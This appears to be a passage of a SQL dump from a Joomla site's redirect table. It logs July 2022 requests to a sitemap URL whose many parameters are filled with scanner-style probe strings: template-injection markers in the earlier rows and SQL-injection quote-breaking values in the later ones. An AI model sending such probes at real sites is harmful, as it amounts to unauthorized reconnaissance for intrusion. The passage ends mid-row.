00:00:00',301),(23983,'https://ekvatorprint.com.ua/index.php?option=com_xmap&sitemap=1&text=8${{<%[}}%\\&test=8${{<%[}}%\\&path=8${{<%[}}%\\&language=8${{<%[}}%\\&height=8${{<%[}}%\\&logout=8${{<%[}}%\\&pass=8${{<%[}}%\\&dir=8${{<%[}}%\\&show=8${{<%[}}%\\&h=8${{<%[}}%\\',NULL,'https://ekvatorprint.com.ua/t?r=${{ource=${{tm_campaign=${{ium=${{_utm_content=${{','',1,0,'2022-07-22 04:03:18','0000-00-00 00:00:00',301),(23984,'https://ekvatorprint.com.ua/index.php?option=com_xmap&sitemap=1&value=8${{<%[}}%\\&filename=8${{<%[}}%\\&redirect=8${{<%[}}%\\&year=8${{<%[}}%\\&group=8${{<%[}}%\\&template=8${{<%[}}%\\&version=8${{<%[}}%\\&subject=8${{<%[}}%\\&m=8${{<%[}}%\\&download=8${{<%[}}%\\',NULL,'https://ekvatorprint.com.ua/t?r=${{ource=${{tm_campaign=${{ium=${{_utm_content=${{','',1,0,'2022-07-22 04:03:18','0000-00-00 00:00:00',301),(23985,'https://ekvatorprint.com.ua/index.php?option=com_xmap&sitemap=1&method=8${{<%[}}%\\&uid=8${{<%[}}%\\&tag=8${{<%[}}%\\&category=8${{<%[}}%\\&target=8${{<%[}}%\\&ids=8${{<%[}}%\\&term=8${{<%[}}%\\&new=8${{<%[}}%\\&locale=8${{<%[}}%\\&author=8${{<%[}}%\\',NULL,'https://ekvatorprint.com.ua/t?r=${{ource=${{tm_campaign=${{ium=${{_utm_content=${{','',1,0,'2022-07-22 04:03:18','0000-00-00 00:00:00',301),(23986,'https://ekvatorprint.com.ua/index.php?option=com_xmap&sitemap=1&paged=8${{<%[}}%\\&cat=8${{<%[}}%\\&msg=8${{<%[}}%\\&to=8${{<%[}}%\\&add=8${{<%[}}%\\&reset=8${{<%[}}%\\&d=8${{<%[}}%\\&day=8${{<%[}}%\\&nonce=8${{<%[}}%\\&captcha=8${{<%[}}%\\',NULL,'https://ekvatorprint.com.ua/t?r=${{ource=${{tm_campaign=${{ium=${{_utm_content=${{','',1,0,'2022-07-22 04:03:18','0000-00-00 00:00:00',301),(23987,'https://ekvatorprint.com.ua/index.php?option=com_xmap&sitemap=1&output=8${{<%[}}%\\&host=8${{<%[}}%\\&revision=8${{<%[}}%\\&i=8${{<%[}}%\\&xml=8${{<%[}}%\\&db=8${{<%[}}%\\&time=8${{<%[}}%\\&section=8${{<%[}}%\\&image=8${{<%[}}%\\&r=8${{<%[}}%\\',NULL,'https://ekvatorprint.com.ua/t?r=${{ource=${{tm_campaign=${{ium=${{_utm_content=${{','',1,0,'2022-07-22 04:03:18','0000-00-00 00:00:00',301),(23988,'https://ekvatorprint.com.ua/index.php?option=com_xmap&sitemap=1&files=8${{<%[}}%\\&tags=8${{<%[}}%\\&users=8${{<%[}}%\\&role=8${{<%[}}%\\&send=8${{<%[}}%\\&fetch=8${{<%[}}%\\&updated=8${{<%[}}%\\&skips=8${{<%[}}%\\&n=8${{<%[}}%\\&check=8${{<%[}}%\\',NULL,'https://ekvatorprint.com.ua/t?r=${{ource=${{tm_campaign=${{ium=${{_utm_content=${{','',1,0,'2022-07-22 04:03:18','0000-00-00 00:00:00',301),(23989,'https://ekvatorprint.com.ua/index.php?option=com_xmap&sitemap=1&table=8${{<%[}}%\\&orderby=8${{<%[}}%\\&num=1355861438119404${{<%[}}%\\&import=8${{<%[}}%\\&html=8${{<%[}}%\\&log=8${{<%[}}%\\&prefix=8${{<%[}}%\\&fields=8${{<%[}}%\\&pwd=8${{<%[}}%\\&pid=8${{<%[}}%\\',NULL,'https://ekvatorprint.com.ua/t?r=${{ource=${{tm_campaign=${{ium=${{_utm_content=${{','',1,0,'2022-07-22 04:03:18','0000-00-00 00:00:00',301),(23990,'https://ekvatorprint.com.ua/index.php?option=com_xmap&sitemap=1&month=8${{<%[}}%\\&module=8${{<%[}}%\\&parent=8${{<%[}}%\\&cancel=8${{<%[}}%\\&activate=8${{<%[}}%\\&ip=8${{<%[}}%\\&checked=8${{<%[}}%\\&success=8${{<%[}}%\\&field=8${{<%[}}%\\&desc=8${{<%[}}%\\',NULL,'https://ekvatorprint.com.ua/t?r=${{ource=${{tm_campaign=${{ium=${{_utm_content=${{','',1,0,'2022-07-22 04:03:19','0000-00-00 00:00:00',301),(23991,'https://ekvatorprint.com.ua/index.php?option=com_xmap&sitemap=1&case=8${{<%[}}%\\&remove=8${{<%[}}%\\&position=8${{<%[}}%\\&location=8${{<%[}}%\\&extra=8${{<%[}}%\\&count=8${{<%[}}%\\&b=8${{<%[}}%\\&rating=8${{<%[}}%\\&pass2=8${{<%[}}%\\&hostname=8${{<%[}}%\\',NULL,'https://ekvatorprint.com.ua/t?r=${{ource=${{tm_campaign=${{ium=${{_utm_content=${{','',1,0,'2022-07-22 04:03:19','0000-00-00 00:00:00',301),(23992,'https://ekvatorprint.com.ua/index.php?option=com_xmap&sitemap=1&move=8${{<%[}}%\\&hash=8${{<%[}}%\\&dry=8${{<%[}}%\\&cid=8${{<%[}}%\\&body=8${{<%[}}%\\&src=8${{<%[}}%\\&level=8${{<%[}}%\\&generate=8${{<%[}}%\\&g=8${{<%[}}%\\&folder=8${{<%[}}%\\',NULL,'https://ekvatorprint.com.ua/t?r=${{ource=${{tm_campaign=${{ium=${{_utm_content=${{','',1,0,'2022-07-22 04:03:19','0000-00-00 00:00:00',301),(23993,'https://ekvatorprint.com.ua/index.php?option=com_xmap&sitemap=1&dbname=8${{<%[}}%\\&option=8${{<%[}}%\\&userid=8${{<%[}}%\\&sql=8${{<%[}}%\\&options=8${{<%[}}%\\&address=8${{<%[}}%\\&activated=8${{<%[}}%\\&action2=8${{<%[}}%\\&password2=8${{<%[}}%\\&pass1=8${{<%[}}%\\',NULL,'https://ekvatorprint.com.ua/t?r=${{ource=${{tm_campaign=${{ium=${{_utm_content=${{','',1,0,'2022-07-22 04:03:20','0000-00-00 00:00:00',301),(23994,'https://ekvatorprint.com.ua/index.php?option=com_xmap&sitemap=1&guid=8${{<%[}}%\\&dt=8${{<%[}}%\\&x=8${{<%[}}%\\&load=8${{<%[}}%\\&list=8${{<%[}}%\\&user=8${{<%[}}%\\&menu=8${{<%[}}%\\&blog=8${{<%[}}%\\&link=8${{<%[}}%\\&end=8${{<%[}}%\\',NULL,'https://ekvatorprint.com.ua/t?r=${{ource=${{tm_campaign=${{ium=${{_utm_content=${{','',1,0,'2022-07-22 04:03:20','0000-00-00 00:00:00',301),(23995,'https://ekvatorprint.com.ua/index.php?option=com_xmap&sitemap=1&meta=8${{<%[}}%\\&id=8${{<%[}}%\\&deleted=8${{<%[}}%\\&act=8${{<%[}}%\\&port=8${{<%[}}%\\&e=8${{<%[}}%\\&taxonomy=8${{<%[}}%\\&ref=8${{<%[}}%\\&publish=8${{<%[}}%\\&secret=8${{<%[}}%\\',NULL,'https://ekvatorprint.com.ua/t?r=${{ource=${{tm_campaign=${{ium=${{_utm_content=${{','',1,0,'2022-07-22 04:03:20','0000-00-00 00:00:00',301),(23996,'https://ekvatorprint.com.ua/index.php?option=com_xmap&sitemap=1&mm=8${{<%[}}%\\&rsd=8${{<%[}}%\\&ps=8${{<%[}}%\\&mn=8${{<%[}}%\\&jj=8${{<%[}}%\\&aa=8${{<%[}}%\\&slug=8${{<%[}}%\\&o=8${{<%[}}%\\&note=8${{<%[}}%\\&l=8${{<%[}}%\\',NULL,'https://ekvatorprint.com.ua/t?r=${{ource=${{tm_campaign=${{ium=${{_utm_content=${{','',1,0,'2022-07-22 04:03:20','0000-00-00 00:00:00',301),(23997,'https://ekvatorprint.com.ua/index.php?option=com_xmap&sitemap=1&sid=8${{<%[}}%\\&feed=8${{<%[}}%\\&tax=8${{<%[}}%\\&ss=8${{<%[}}%\\&gid=8${{<%[}}%\\&city=8${{<%[}}%\\&spam=8${{<%[}}%\\&all=8${{<%[}}%\\&hh=8${{<%[}}%\\&nsql=8${{<%[}}%\\',NULL,'https://ekvatorprint.com.ua/t?r=${{ource=${{tm_campaign=${{ium=${{_utm_content=${{','',1,0,'2022-07-22 04:03:20','0000-00-00 00:00:00',301),(23998,'https://ekvatorprint.com.ua/index.php?option=com_xmap&sitemap=1&tid=8${{<%[}}%\\&form=8${{<%[}}%\\&down=8${{<%[}}%\\&val=8${{<%[}}%\\&mail=u9423@gmail.com${{<%[}}%\\&fid=8${{<%[}}%\\&back=8${{<%[}}%\\&mod=8${{<%[}}%\\&img=8${{<%[}}%\\&hide=8${{<%[}}%\\',NULL,'https://ekvatorprint.com.ua/t?r=${{ource=${{tm_campaign=${{ium=${{_utm_content=${{','',1,0,'2022-07-22 04:03:20','0000-00-00 00:00:00',301),(23999,'https://ekvatorprint.com.ua/index.php?option=com_xmap&sitemap=1&auth=8${{<%[}}%\\&task=8${{<%[}}%\\&zip=8${{<%[}}%\\&mid=8${{<%[}}%\\&next=8${{<%[}}%\\&main=8${{<%[}}%\\&js=8${{<%[}}%\\&lat=8${{<%[}}%\\&find=8${{<%[}}%\\&alt=8${{<%[}}%\\',NULL,'https://ekvatorprint.com.ua/t?r=${{ource=${{tm_campaign=${{ium=${{_utm_content=${{','',1,0,'2022-07-22 04:03:21','0000-00-00 00:00:00',301),(24000,'https://ekvatorprint.com.ua/index.php?option=com_xmap&sitemap=1&set=8${{<%[}}%\\&sub=8${{<%[}}%\\&same=8${{<%[}}%\\&rows=8${{<%[}}%\\&aid=8${{<%[}}%\\&vote=8${{<%[}}%\\&site=8${{<%[}}%\\&keys=8${{<%[}}%\\&dest=8${{<%[}}%\\&up=8${{<%[}}%\\',NULL,'https://ekvatorprint.com.ua/t?r=${{ource=${{tm_campaign=${{ium=${{_utm_content=${{','',1,0,'2022-07-22 04:03:21','0000-00-00 00:00:00',301),(24001,'https://ekvatorprint.com.ua/index.php?option=com_xmap&sitemap=1&pos=8${{<%[}}%\\&kill=8${{<%[}}%\\&api=8${{<%[}}%\\&z=8${{<%[}}%\\&last=8${{<%[}}%\\&rid=8${{<%[}}%\\&pg=8${{<%[}}%\\&ns=8${{<%[}}%\\&css=8${{<%[}}%\\&what=8${{<%[}}%\\',NULL,'https://ekvatorprint.com.ua/t?r=${{ource=${{tm_campaign=${{ium=${{_utm_content=${{','',1,0,'2022-07-22 04:03:21','0000-00-00 00:00:00',301),(24002,'https://ekvatorprint.com.ua/index.php?option=com_xmap&sitemap=1&create=8${{<%[}}%\\&app=8${{<%[}}%\\&rememberme=8${{<%[}}%\\&number=1355862007203237${{<%[}}%\\&country=8${{<%[}}%\\&phone=1355862007204297${{<%[}}%\\&hidden=8${{<%[}}%\\&force=8${{<%[}}%\\&export=8${{<%[}}%\\&sticky=8${{<%[}}%\\',NULL,'https://ekvatorprint.com.ua/t?r=${{ource=${{tm_campaign=${{ium=${{_utm_content=${{','',1,0,'2022-07-22 04:03:21','0000-00-00 00:00:00',301),(24003,'https://ekvatorprint.com.ua/index.php?option=com_xmap&sitemap=1&cmd=8${{<%[}}%\\&v=8${{<%[}}%\\&item=8${{<%[}}%\\&part=8${{<%[}}%\\&json=8${{<%[}}%\\&del=8${{<%[}}%\\&base=8${{<%[}}%\\&foo=8${{<%[}}%\\&y=8${{<%[}}%\\&info=8${{<%[}}%\\',NULL,'https://ekvatorprint.com.ua/t?r=${{ource=${{tm_campaign=${{ium=${{_utm_content=${{','',1,0,'2022-07-22 04:03:21','0000-00-00 00:00:00',301),(24004,'https://ekvatorprint.com.ua/index.php?option=com_xmap&sitemap=1&rank=8${{<%[}}%\\&max=8${{<%[}}%\\&make=8${{<%[}}%\\&days=8${{<%[}}%\\&skin=8${{<%[}}%\\&done=8${{<%[}}%\\&root=8${{<%[}}%\\&go=8${{<%[}}%\\&dump=8${{<%[}}%\\&uri=8${{<%[}}%\\',NULL,'https://ekvatorprint.com.ua/t?r=${{ource=${{tm_campaign=${{ium=${{_utm_content=${{','',1,0,'2022-07-22 04:03:21','0000-00-00 00:00:00',301),(24005,'https://ekvatorprint.com.ua/index.php?option=com_xmap&sitemap=1&pw=8${{<%[}}%\\&drop=8${{<%[}}%\\&goto=8${{<%[}}%\\&st=8${{<%[}}%\\&skip=8${{<%[}}%\\&node=8${{<%[}}%\\&type=8${{<%[}}%\\&lng=8${{<%[}}%\\&left=8${{<%[}}%\\&k=8${{<%[}}%\\',NULL,'https://ekvatorprint.com.ua/t?r=${{ource=${{tm_campaign=${{ium=${{_utm_content=${{','',1,0,'2022-07-22 04:03:21','0000-00-00 00:00:00',301),(24006,'https://ekvatorprint.com.ua/index.php?option=com_xmap&sitemap=1&fn=8${{<%[}}%\\&flag=8${{<%[}}%\\&copy=8${{<%[}}%\\&line=8${{<%[}}%\\&jax=8${{<%[}}%\\&icon=8${{<%[}}%\\&dl=8${{<%[}}%\\&bid=8${{<%[}}%\\&yes=8${{<%[}}%\\&run=8${{<%[}}%\\',NULL,'https://ekvatorprint.com.ua/t?r=${{ource=${{tm_campaign=${{ium=${{_utm_content=${{','',1,0,'2022-07-22 04:03:21','0000-00-00 00:00:00',301),(24007,'https://ekvatorprint.com.ua/index.php?option=com_xmap&sitemap=1&read=8${{<%[}}%\\&post=8${{<%[}}%\\&nid=8${{<%[}}%\\&map=8${{<%[}}%\\&hour=8${{<%[}}%\\&zoom=8${{<%[}}%\\&rs=8${{<%[}}%\\&ok=8${{<%[}}%\\&mark=8${{<%[}}%\\&lid=8${{<%[}}%\\',NULL,'https://ekvatorprint.com.ua/t?r=${{ource=${{tm_campaign=${{ium=${{_utm_content=${{','',1,0,'2022-07-22 04:03:21','0000-00-00 00:00:00',301),(24008,'https://ekvatorprint.com.ua/index.php?option=com_xmap&sitemap=1&full=8${{<%[}}%\\&err=8${{<%[}}%\\&doit=8${{<%[}}%\\&ac=8${{<%[}}%\\&sent=8${{<%[}}%\\&open=8${{<%[}}%\\&doc=8${{<%[}}%\\&args=8${{<%[}}%\\&inc=8${{<%[}}%\\&func=8${{<%[}}%\\',NULL,'https://ekvatorprint.com.ua/t?r=${{ource=${{tm_campaign=${{ium=${{_utm_content=${{','',1,0,'2022-07-22 04:03:21','0000-00-00 00:00:00',301),(24009,'https://ekvatorprint.com.ua/index.php?option=com_xmap&sitemap=1&news=8${{<%[}}%\\&frob=8${{<%[}}%\\&area=8${{<%[}}%\\&aim=8${{<%[}}%\\&vid=8${{<%[}}%\\&unit=8${{<%[}}%\\&opt=8${{<%[}}%\\&job=8${{<%[}}%\\&idx=8${{<%[}}%\\&help=8${{<%[}}%\\',NULL,'https://ekvatorprint.com.ua/t?r=${{ource=${{tm_campaign=${{ium=${{_utm_content=${{','',1,0,'2022-07-22 04:03:21','0000-00-00 00:00:00',301),(24010,'https://ekvatorprint.com.ua/index.php?option=com_xmap&sitemap=1&ver=8${{<%[}}%\\&ts=8${{<%[}}%\\&row=8${{<%[}}%\\&raw=8${{<%[}}%\\&qid=8${{<%[}}%\\&old=8${{<%[}}%\\&nick=8${{<%[}}%\\&lon=8${{<%[}}%\\&lock=8${{<%[}}%\\&ext=8${{<%[}}%\\',NULL,'https://ekvatorprint.com.ua/t?r=${{ource=${{tm_campaign=${{ium=${{_utm_content=${{','',1,0,'2022-07-22 04:03:21','0000-00-00 00:00:00',301),(24011,'https://ekvatorprint.com.ua/index.php?option=com_xmap&sitemap=1&word=8${{<%[}}%\\&oid=8${{<%[}}%\\&mac=8${{<%[}}%\\&from=8${{<%[}}%\\&font=8${{<%[}}%\\&eid=8${{<%[}}%\\&dst=8${{<%[}}%\\&demo=8${{<%[}}%\\&cms=8${{<%[}}%\\&as=8${{<%[}}%\\',NULL,'https://ekvatorprint.com.ua/t?r=${{ource=${{tm_campaign=${{ium=${{_utm_content=${{','',1,0,'2022-07-22 04:03:22','0000-00-00 00:00:00',301),(24012,'https://ekvatorprint.com.ua/index.php?option=com_xmap&sitemap=1&cp=8${{<%[}}%\\&var=8${{<%[}}%\\&tpl=8${{<%[}}%\\&top=8${{<%[}}%\\&sex=8${{<%[}}%\\&rt=8${{<%[}}%\\&rate=8${{<%[}}%\\&get=8${{<%[}}%\\&box=8${{<%[}}%\\&age=8${{<%[}}%\\',NULL,'https://ekvatorprint.com.ua/t?r=${{ource=${{tm_campaign=${{ium=${{_utm_content=${{','',1,0,'2022-07-22 04:03:22','0000-00-00 00:00:00',301),(24013,'https://ekvatorprint.com.ua/index.php?option=com_xmap&sitemap=1&zone=8${{<%[}}%\\&usr=8${{<%[}}%\\&to=8${{<%[}}%\\&ssl=8${{<%[}}%\\&name=8${{<%[}}%\\&min=8${{<%[}}%\\&logo=8${{<%[}}%\\&by=8${{<%[}}%\\&bg=8${{<%[}}%\\&ban=8${{<%[}}%\\',NULL,'https://ekvatorprint.com.ua/t?r=${{ource=${{tm_campaign=${{ium=${{_utm_content=${{','',1,0,'2022-07-22 04:03:22','0000-00-00 00:00:00',301),(24014,'https://ekvatorprint.com.ua/index.php?option=com_xmap&sitemap=1&un=8${{<%[}}%\\&pic=8${{<%[}}%\\&mime=8${{<%[}}%\\&loc=8${{<%[}}%\\&deny=8${{<%[}}%\\&yim=8${{<%[}}%\\&week=8${{<%[}}%\\&sig=8${{<%[}}%\\&room=8${{<%[}}%\\&req=8${{<%[}}%\\',NULL,'https://ekvatorprint.com.ua/t?r=${{ource=${{tm_campaign=${{ium=${{_utm_content=${{','',1,0,'2022-07-22 04:03:22','0000-00-00 00:00:00',301),(24015,'https://ekvatorprint.com.ua/index.php?option=com_xmap&sitemap=1&title=81x\'\'\"%27\\&code=81x\'\'\"%27\\&q=81x\'\'\"%27\\&submit=81x\'\'\"%27\\&user=81x\'\'\"%27\\&token=81x\'\'\"%27\\&delete=81x\'\'\"%27\\&message=81x\'\'\"%27\\&t=81x\'\'\"%27\\&c=81x\'\'\"%27\\',NULL,'https://ekvatorprint.com.ua/t?r=1x%27\'\"%2527\\&utm_source=1x%27\'\"%2527\\&_utm_source=1x%27\'\"%2527\\&_utm_campaign=1x%27\'\"%2527\\&_utm_medium=1x%27\'\"%2527\\&_utm_content=1x%27\'\"%2527\\','',1,0,'2022-07-22 04:03:22','0000-00-00 00:00:00',301),(24016,'https://ekvatorprint.com.ua/index.php?option=com_xmap&sitemap=1&data=81x\'\'\"%27\\&mode=81x\'\'\"%27\\&order=81x\'\'\"%27\\&lang=81x\'\'\"%27\\&p=81x\'\'\"%27\\&key=81x\'\'\"%27\\&status=81x\'\'\"%27\\&start=81x\'\'\"%27\\&charset=81x\'\'\"%27\\&description=81x\'\'\"%27\\',NULL,'https://ekvatorprint.com.ua/t?r=1x%27\'\"%2527\\&utm_source=1x%27\'\"%2527\\&_utm_source=1x%27\'\"%2527\\&_utm_campaign=1x%27\'\"%2527\\&_utm_medium=1x%27\'\"%2527\\&_utm_content=1x%27\'\"%2527\\','',1,0,'2022-07-22 04:03:22','0000-00-00 00:00:00',301),(24017,'https://ekvatorprint.com.ua/index.php?option=com_xmap&sitemap=1&s=81x\'\'\"%27\\&post=81x\'\'\"%27\\&excerpt=81x\'\'\"%27\\&login=81x\'\'\"%27\\&search=81x\'\'\"%27\\&content=81x\'\'\"%27\\&comment=81x\'\'\"%27\\&step=81x\'\'\"%27\\&ajax=81x\'\'\"%27\\&debug=81x\'\'\"%27\\',NULL,'https://ekvatorprint.com.ua/t?r=1x%27\'\"%2527\\&utm_source=1x%27\'\"%2527\\&_utm_source=1x%27\'\"%2527\\&_utm_campaign=1x%27\'\"%2527\\&_utm_medium=1x%27\'\"%2527\\&_utm_content=1x%27\'\"%2527\\','',1,0,'2022-07-22 04:03:22','0000-00-00 00:00:00',301),(24018,'https://ekvatorprint.com.ua/index.php?option=com_xmap&sitemap=1&state=81x\'\'\"%27\\&query=81x\'\'\"%27\\&f=81x\'\'\"%27\\&error=81x\'\'\"%27\\&save=81x\'\'\"%27\\&sort=81x\'\'\"%27\\&format=81x\'\'\"%27\\&tab=81x\'\'\"%27\\&offset=81x\'\'\"%27\\&edit=81x\'\'\"%27\\',NULL,'https://ekvatorprint.com.ua/t?r=1x%27\'\"%2527\\&utm_source=1x%27\'\"%2527\\&_utm_source=1x%27\'\"%2527\\&_utm_campaign=1x%27\'\"%2527\\&_utm_medium=1x%27\'\"%2527\\&_utm_content=1x%27\'\"%2527\\','',1,0,'2022-07-22 04:03:22','0000-00-00 00:00:00',301),(24019,'https://ekvatorprint.com.ua/index.php?option=com_xmap&sitemap=1&preview=81x\'\'\"%27\\&filter=81x\'\'\"%27\\&update=81x\'\'\"%27\\&from=81x\'\'\"%27\\&view=81x\'\'\"%27\\&a=81x\'\'\"%27\\&limit=81x\'\'\"%27\\&do=81x\'\'\"%27\\&plugin=81x\'\'\"%27\\&theme=81x\'\'\"%27\\',NULL,'https://ekvatorprint.com.ua/t?r=1x%27\'\"%2527\\&utm_source=1x%27\'\"%2527\\&_utm_source=1x%27\'\"%2527\\&_utm_campaign=1x%27\'\"%2527\\&_utm_medium=1x%27\'\"%2527\\&_utm_content=1x%27\'\"%2527\\','',1,0,'2022-07-22 04:03:22','0000-00-00 00:00:00',301),(24020,'https://ekvatorprint.com.ua/index.php?option=com_xmap&sitemap=1&text=81x\'\'\"%27\\&test=81x\'\'\"%27\\&path=81x\'\'\"%27\\&language=81x\'\'\"%27\\&height=81x\'\'\"%27\\&logout=81x\'\'\"%27\\&pass=81x\'\'\"%27\\&dir=81x\'\'\"%27\\&show=81x\'\'\"%27\\&h=81x\'\'\"%27\\',NULL,'https://ekvatorprint.com.ua/t?r=1x%27\'\"%2527\\&utm_source=1x%27\'\"%2527\\&_utm_source=1x%27\'\"%2527\\&_utm_campaign=1x%27\'\"%2527\\&_utm_medium=1x%27\'\"%2527\\&_utm_content=1x%27\'\"%2527\\','',1,0,'2022-07-22 04:03:22','0000-00-00 00:00:00',301),(24021,'https://ekvatorprint.com.ua/index.php?option=com_xmap&sitemap=1&value=81x\'\'\"%27\\&filename=81x\'\'\"%27\\&redirect=81x\'\'\"%27\\&year=81x\'\'\"%27\\&group=81x\'\'\"%27\\&template=81x\'\'\"%27\\&version=81x\'\'\"%27\\&subject=81x\'\'\"%27\\&m=81x\'\'\"%27\\&download=81x\'\'\"%27\\',NULL,'https://ekvatorprint.com.ua/t?r=1x%27\'\"%2527\\&utm_source=1x%27\'\"%2527\\&_utm_source=1x%27\'\"%2527\\&_utm_campaign=1x%27\'\"%2527\\&_utm_medium=1x%27\'\"%2527\\&_utm_content=1x%27\'\"%2527\\','',1,0,'2022-07-22 04:03:22','0000-00-00 00:00:00',301),(24022,'https://ekvatorprint.com.ua/index.php?option=com_xmap&sitemap=1&method=81x\'\'\"%27\\&uid=81x\'\'\"%27\\&tag=81x\'\'\"%27\\&category=81x\'\'\"%27\\&target=81x\'\'\"%27\\&ids=81x\'\'\"%27\\&term=81x\'\'\"%27\\&new=81x\'\'\"%27\\&locale=81x\'\'\"%27\\&author=81x\'\'\"%27\\',NULL,'https://ekvatorprint.com.ua/t?r=1x%27\'\"%2527\\&utm_source=1x%27\'\"%2527\\&_utm_source=1x%27\'\"%2527\\&_utm_campaign=1x%27\'\"%2527\\&_utm_medium=1x%27\'\"%2527\\&_utm_content=1x%27\'\"%2527\\','',1,0,'2022-07-22 04:03:23','0000-00-00 00:00:00',301),(24023,'https://ekvatorprint.com.ua/index.php?option=com_xmap&sitemap=1&paged=81x\'\'\"%27\\&cat=81x\'\'\"%27\\&msg=81x\'\'\"%27\\&to=81x\'\'\"%27\\&add=81x\'\'\"%27\\&reset=81x\'\'\"%27\\&d=81x\'\'\"%27\\&day=81x\'\'\"%27\\&nonce=81x\'\'\"%27\\&captcha=81x\'\'\"%27\\',NULL,'https://ekvatorprint.com.ua/t?r=1x%27\'\"%2527\\&utm_source=1x%27\'\"%2527\\&_utm_source=1x%27\'\"%2527\\&_utm_campaign=1x%27\'\"%2527\\&_utm_medium=1x%27\'\"%2527\\&_utm_content=1x%27\'\"%2527\\','',1,0,'2022-07-22 04:03:23','0000-00-00 00:00:00',301),(24024,'https://ekvatorprint.com.ua/index.php?option=com_xmap&sitemap=1&files=81x\'\'\"%27\\&tags=81x\'\'\"%27\\&users=81x\'\'\"%27\\&role=81x\'\'\"%27\\&send=81x\'\'\"%27\\&fetch=81x\'\'\"%27\\&updated=81x\'\'\"%27\\&skips=81x\'\'\"%27\\&n=81x\'\'\"%27\\&check=81x\'\'\"%27\\',NULL,'https://ekvatorprint.com.ua/t?r=1x%27\'\"%2527\\&utm_source=1x%27\'\"%2527\\&_utm_source=1x%27\'\"%2527\\&_utm_campaign=1x%27\'\"%2527\\&_utm_medium=1x%27\'\"%2527\\&_utm_content=1x%27\'\"%2527\\','',1,0,'2022-07-22 04:03:23','0000-00-00 00:00:00',301),(24025,'https://ekvatorprint.com.ua/index.php?option=com_xmap&sitemap=1&output=81x\'\'\"%27\\&host=81x\'\'\"%27\\&revision=81x\'\'\"%27\\&i=81x\'\'\"%27\\&xml=81x\'\'\"%27\\&db=81x\'\'\"%27\\&time=81x\'\'\"%27\\&section=81x\'\'\"%27\\&image=81x\'\'\"%27\\&r=81x\'\'\"%27\\',NULL,'https://ekvatorprint.com.ua/t?r=1x%27\'\"%2527\\&utm_source=1x%27\'\"%2527\\&_utm_source=1x%27\'\"%2527\\&_utm_campaign=1x%27\'\"%2527\\&_utm_medium=1x%27\'\"%2527\\&_utm_content=1x%27\'\"%2527\\','',1,0,'2022-07-22 04:03:23','0000-00-00 00:00:00',301),(24026,'https://ekvatorprint.com.ua/index.php?option=com_xmap&sitemap=1&table=81x\'\'\"%27\\&orderby=81x\'\'\"%27\\&num=13558662526961241x\'\'\"%27\\&import=81x\'\'\"%27\\&html=81x\'\'\"%27\\&log=81x\'\'\"%27\\&prefix=81x\'\'\"%27\\&fields=81x\'\'\"%27\\&pwd=81x\'\'\"%27\\&pid=81x\'\'\"%27\\',NULL,'https://ekvatorprint.com.ua/t?r=1x%27\'\"%2527\\&utm_source=1x%27\'\"%2527\\&_utm_source=1x%27\'\"%2527\\&_utm_campaign=1x%27\'\"%2527\\&_utm_medium=1x%27\'\"%2527\\&_utm_content=1x%27\'\"%2527\\','',1,0,'2022-07-22 04:03:23','0000-00-00 00:00:00',301),(24027,'https://ekvatorprint.com.ua/index.php?option=com_xmap&sitemap=1&case=81x\'\'\"%27\\&remove=81x\'\'\"%27\\&position=81x\'\'\"%27\\&location=81x\'\'\"%27\\&extra=81x\'\'\"%27\\&count=81x\'\'\"%27\\&b=81x\'\'\"%27\\&rating=81x\'\'\"%27\\&pass2=81x\'\'\"%27\\&hostname=81x\'\'\"%27\\',NULL,'https://ekvatorprint.com.ua/t?r=1x%27\'\"%2527\\&utm_source=1x%27\'\"%2527\\&_utm_source=1x%27\'\"%2527\\&_utm_campaign=1x%27\'\"%2527\\&_utm_medium=1x%27\'\"%2527\\&_utm_content=1x%27\'\"%2527\\','',1,0,'2022-07-22 04:03:23','0000-00-00 00:00:00',301),(24028,'https://ekvatorprint.com.ua/index.php?option=com_xmap&sitemap=1&month=81x\'\'\"%27\\&module=81x\'\'\"%27\\&parent=81x\'\'\"%27\\&cancel=81x\'\'\"%27\\&activate=81x\'\'\"%27\\&ip=81x\'\'\"%27\\&checked=81x\'\'\"%27\\&success=81x\'\'\"%27\\&field=81x\'\'\"%27\\&desc=81x\'\'\"%27\\',NULL,'https://ekvatorprint.com.ua/t?r=1x%27\'\"%2527\\&utm_source=1x%27\'\"%2527\\&_utm_source=1x%27\'\"%2527\\&_utm_campaign=1x%27\'\"%2527\\&_utm_medium=1x%27\'\"%2527\\&_utm_content=1x%27\'\"%2527\\','',1,0,'2022-07-22 04:03:23','0000-00-00 00:00:00',301),(24029,'https://ekvatorprint.com.ua/index.php?option=com_xmap&sitemap=1&dbname=81x\'\'\"%27\\&option=81x\'\'\"%27\\&userid=81x\'\'\"%27\\&sql=81x\'\'\"%27\\&options=81x\'\'\"%27\\&address=81x\'\'\"%27\\&activated=81x\'\'\"%27\\&action2=81x\'\'\"%27\\&password2=81x\'\'\"%27\\&pass1=81x\'\'\"%27\\',NULL,'https://ekvatorprint.com.ua/t?r=1x%27\'\"%2527\\&utm_source=1x%27\'\"%2527\\&_utm_source=1x%27\'\"%2527\\&_utm_campaign=1x%27\'\"%2527\\&_utm_medium=1x%27\'\"%2527\\&_utm_content=1x%27\'\"%2527\\','',1,0,'2022-07-22 04:03:23','0000-00-00 00:00:00',301),(24030,'https://ekvatorprint.com.ua/index.php?option=com_xmap&sitemap=1&move=81x\'\'\"%27\\&hash=81x\'\'\"%27\\&dry=81x\'\'\"%27\\&cid=81x\'\'\"%27\\&body=81x\'\'\"%27\\&src=81x\'\'\"%27\\&level=81x\'\'\"%27\\&generate=81x\'\'\"%27\\&g=81x\'\'\"%27\\&folder=81x\'\'\"%27\\',NULL,'https://ekvatorprint.com.ua/t?r=1x%27\'\"%2527\\&utm_source=1x%27\'\"%2527\\&_utm_source=1x%27\'\"%2527\\&_utm_campaign=1x%27\'\"%2527\\&_utm_medium=1x%27\'\"%2527\\&_utm_content=1x%27\'\"%2527\\','',1,0,'2022-07-22 04:03:23','0000-00-00 